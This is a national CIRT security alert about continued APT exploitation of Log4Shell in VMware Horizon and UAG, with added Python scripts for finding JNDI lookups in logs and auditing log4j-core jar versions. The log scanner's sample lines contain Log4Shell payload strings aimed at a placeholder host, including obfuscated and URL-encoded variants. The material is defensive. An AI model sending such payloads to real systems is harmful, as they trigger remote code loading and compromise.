AL2022_42 Log4Shell is still being exploited by advanced persistent threats (APTs) in VMware products. (28th June 2022)

Description   

The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) issued a joint Cybersecurity Advisory (CSA) on June 23, 2022. It was released to alert network defenders to the continued exploitation of CVE-2021-44228 (Log4Shell) by Advanced Persistent Threat (APT) actors on unpatched VMware Horizon and Unified Access Gateway (UAG) servers.

Summary 

Log4Shell has been exploited by multiple threat actor groups on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors installed loader malware on compromised systems; the loaders contained embedded executables that provided remote command and control (C2). In one confirmed compromise, the attackers moved laterally inside the network and collected and exfiltrated sensitive data.

How it works 

CVE-2021-44228 allows a malicious user to execute arbitrary code on a machine or pod by exploiting a flaw in the log4j library. The attacker sends a specially crafted request to a vulnerable system; when the application logs the request, log4j processes the crafted string and the system executes code of the attacker's choosing. A single such request can give the attacker complete control of the affected system.
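Because the crafted string has to reach a log4j logger, it usually shows up in web-server or application logs before any other artifact does. The script below is an added detection example written for this alert; it is not code from CISA, CGCYBER, VMware or the Guyana National CIRT. It scans constructed (not real) access-log lines for the Log4j JNDI lookup token after undoing URL encoding and the lookup nesting that log4j itself expands, so that the literal `${jndi:` is visible to a plain search. The log format and host name `EXAMPLE-HOST` are assumptions for the sample.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
# Lines 2-4 carry a Log4j lookup in the User-Agent or query string; lines 1 and 5 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [23/Jun/2022:10:01:09 +0000] "GET /portal/info.jsp HTTP/1.1" 200 311 "-" "${jndi:ldap://EXAMPLE-HOST/a}"',
    '10.0.0.9 - - [23/Jun/2022:10:02:14 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://EXAMPLE-HOST/b}"',
    '10.0.0.11 - - [23/Jun/2022:10:03:22 +0000] "GET /portal/?q=%24%7Bjndi%3Adns%3A%2F%2FEXAMPLE-HOST%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.13 - - [23/Jun/2022:10:04:31 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (build ${version})"',
]

# Log4j lookup forms that hide the token from a naive substring search:
#   ${lower:J} / ${upper:j}  -> case-converted single character
#   ${anything:-j}           -> default-value syntax resolving to "j"
_CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The token we actually want to see once normalisation is done.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 5) -> str:
    """Undo URL encoding and the nested lookups above until the text stops changing."""
    for _ in range(max_rounds):
        previous = text
        text = unquote(text)
        text = _CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(), text
        )
        text = _DEFAULT_RE.sub(r"\1", text)
        if text == previous:
            break
    return text


def is_jndi_lookup(text: str) -> bool:
    """True when the (normalised) text contains a Log4j JNDI lookup."""
    return _JNDI_RE.search(normalize(text)) is not None


def scan_log_lines(lines):
    """Return (1-based line number, normalised evidence snippet) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        match = _JNDI_RE.search(normalized)
        if match:
            start = max(0, match.start() - 10)
            hits.append((number, normalized[start:match.end() + 40]))
    return hits


if __name__ == "__main__":
    for number, evidence in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: {evidence}")
```

Run it against real access logs by reading the file into `scan_log_lines`; a hit is a reason to check the host's patch level and to look for the follow-on activity the advisory describes (loader malware, C2 traffic, lateral movement), not proof of compromise by itself, since many vulnerable targets were scanned without being exploited.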

Remediation  

The Guyana National CIRT encourages organizations with vulnerable VMware Horizon and UAG systems to update all affected systems to the latest version, and to use the published TTPs and IOCs to examine and remediate affected and associated systems.
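Examining a system starts with establishing which log4j-core builds are present, since Horizon and UAG are not the only products that ship the library. The following is an added example for this alert, not code from VMware, Apache or the Guyana National CIRT: it reads the version recorded in a log4j-core jar's manifest (or Maven `pom.properties`), compares it against the affected range of CVE-2021-44228 (2.0-beta9 through 2.14.1, with the 2.12.2 and 2.3.1 backports also fixed), and reports whether the `JndiLookup` class that the well-known interim mitigation deletes is still present. The in-memory sample jars are constructed for the demonstration; the directory walk is the part you would point at a real install.

```python
import io
import re
import zipfile
from pathlib import Path

# Paths inside a log4j-core jar (standard Java/Maven layout).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text: str) -> tuple:
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple of leading integers."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected_version(version: tuple) -> bool:
    """CVE-2021-44228: Log4j 2.0-beta9 to 2.14.1 are affected; 2.15.0+, 2.12.2+ (Java 7) and 2.3.1+ (Java 6) are fixed."""
    if not version or version[0] != 2:
        return False
    if version >= (2, 15, 0):
        return False
    if version[:2] == (2, 12) and version >= (2, 12, 2):
        return False
    if version[:2] == (2, 3) and version >= (2, 3, 1):
        return False
    return True


def assess_log4j_core_jar(jar_bytes: bytes) -> dict:
    """Report version, JndiLookup presence and a status for the bytes of one log4j-core jar."""
    version = None
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        for meta, key, sep in ((MANIFEST, "Implementation-Version", ":"), (POM_PROPERTIES, "version", "=")):
            if meta in names and version is None:
                for line in zf.read(meta).decode("utf-8", "replace").splitlines():
                    k, found, v = line.partition(sep)
                    if found and k.strip() == key:
                        version = v.strip()
                        break
        jndi_present = JNDI_LOOKUP_CLASS in names
    if version is None:
        status = "unknown version" + (" (JndiLookup.class present)" if jndi_present else "")
    elif not is_affected_version(parse_version(version)):
        status = "not affected"
    elif jndi_present:
        status = "vulnerable"
    else:
        status = "mitigated (JndiLookup.class removed); upgrade still recommended"
    return {"version": version, "jndi_lookup_present": jndi_present, "status": status}


def scan_directory(root: str) -> list:
    """Assess every log4j-core*.jar below root; returns (path, assessment) pairs."""
    results = []
    for jar in Path(root).rglob("log4j-core*.jar"):
        try:
            results.append((str(jar), assess_log4j_core_jar(jar.read_bytes())))
        except zipfile.BadZipFile:
            results.append((str(jar), {"version": None, "jndi_lookup_present": False, "status": "unreadable jar"}))
    return results


def build_sample_jar(version: str, include_jndi_lookup: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar: manifest plus an empty placeholder class entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Title: Apache Log4j Core\nImplementation-Version: {version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")  # placeholder, not real bytecode
    return buf.getvalue()


if __name__ == "__main__":
    for ver, jndi in (("2.14.1", True), ("2.14.1", False), ("2.17.1", True)):
        print(ver, assess_log4j_core_jar(build_sample_jar(ver, jndi)))
```

Use `scan_directory` on the install roots of Horizon, UAG and any other Java application on the host; a "mitigated" result means the interim class removal was applied but the vendor update the advisory asks for is still outstanding. Note that log4j embedded inside other archives (WAR or EAR files, fat jars) is not found by this walk.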

The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.

PDF Download: Log4Shell is still being exploited.pdf
